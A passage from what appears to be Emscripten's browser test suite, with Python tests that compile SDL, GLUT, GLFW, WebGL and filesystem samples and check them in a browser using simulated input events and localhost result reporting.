PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_image_jpeg.c'), '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'])
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
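# Helper for manual-reference tests: injects the contents of reftest.js into the generated test.html and
# wraps window.close so doReftest() runs after the final frames have rendered, before the window closes.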
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
def test_sdl_canvas_proxy(self):
open('data.txt', 'w').write('datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_hardware
def test_glgears_proxy(self):
# we modify the asm.js output, so this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test noProxy option applied at runtime
# run normally (duplicates the above test, but verifies we can run outside of the btest harness)
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
original = open('test.js').read()
def copy(to, js_mod, html_mod = lambda x: x):
open(to + '.html', 'w').write(html_mod(open('test.html').read().replace('test.js', to + '.js')))
open(to + '.js', 'w').write(js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy (so the code is proxied), but make the worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.test_port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-to-worker; emits 2 js files, client and worker
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut']).communicate()
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/kripken/emscripten/issues/4069.
open(os.path.join(self.get_dir(), 'flag_0.js'), 'w').write('''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for emterps in [
[],
['-DTEST_SLEEP', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'ASSERTIONS=1', '-s', "SAFE_HEAP=1"]
]:
print(delay, defines, emterps)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
%s
//out('push keydown');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
//out('push keyup');
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
open(os.path.join(self.get_dir(), 'sdl_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_key.c'), '-o', 'page.html'] + defines + emterps + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
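# Injects scripted keydown/keypress/keyup events into the proxied page; a keypress is only synthesized when
# the preceding keydown was not default-prevented, so preventDefault must work across the worker proxy.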
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keypress(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function sendKey(c) {
// Only send the keypress event if the prior keydown event
// was not default-prevented.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. The keydown is not default-prevented, so a
// keypress event should follow.
sendKey(65);
// Send backspace. Default handling of the keydown event should be
// prevented, so no keypress should be sent.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
@requires_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for the glfw joystick test; note it is not used in the SDL tests)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'test_glfw_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3']).communicate()
self.run_browser('page.html', '', '/report_result?2')
@requires_hardware
def test_webgl_context_attributes(self):
# JavaScript code to check support for the attributes we want to test in the WebGL implementation
# (request the attribute, create a context, and check its value afterwards in the context attributes).
# Tests still succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
def test_emscripten_get_now(self):
self.btest('emscripten_get_now.cpp', '1')
@unittest.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
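# Runs test_idbfs_sync.c twice per mode: first with -DFIRST and a fresh secret, then again (optionally with
# -DEXTRA_WORK) without -DFIRST, so state written to the IDBFS mount in the first run must survive into the
# second run via IndexedDB.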
def test_fs_idbfs_sync(self):
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
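# Like test_fs_idbfs_sync, but pre.js mounts IDBFS at /working1 and syncs persisted state into memory before
# main() runs, holding back startup with a run dependency until the sync completes.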
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-lidbfs.js', '-s', 'NO_EXIT_RUNTIME=0']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'NO_EXIT_RUNTIME=0']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
open(self.in_dir('pre.js'), 'w').write('''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
open('file1.txt', 'w').write('first')
if not os.path.exists('sub'): os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
Popen([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js']).communicate()
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
import random
self.clear()
os.mkdir('subdir')
open('file1.txt', 'w').write('0123456789' * (1024*128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024*128))
random_data = bytearray(random.randint(0,255) for x in range(1024*128*10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
assert os.stat('file1.txt').st_size + os.stat(os.path.join('subdir', 'file2.txt')).st_size + os.stat('file3.txt').st_size == 3*1024*128*10 + 1
assert os.stat('test.data').st_size < (3*1024*128*10)/2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
# compress in the file packager, on the server; the client receives compressed data and can use it directly. This is the typical usage.
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
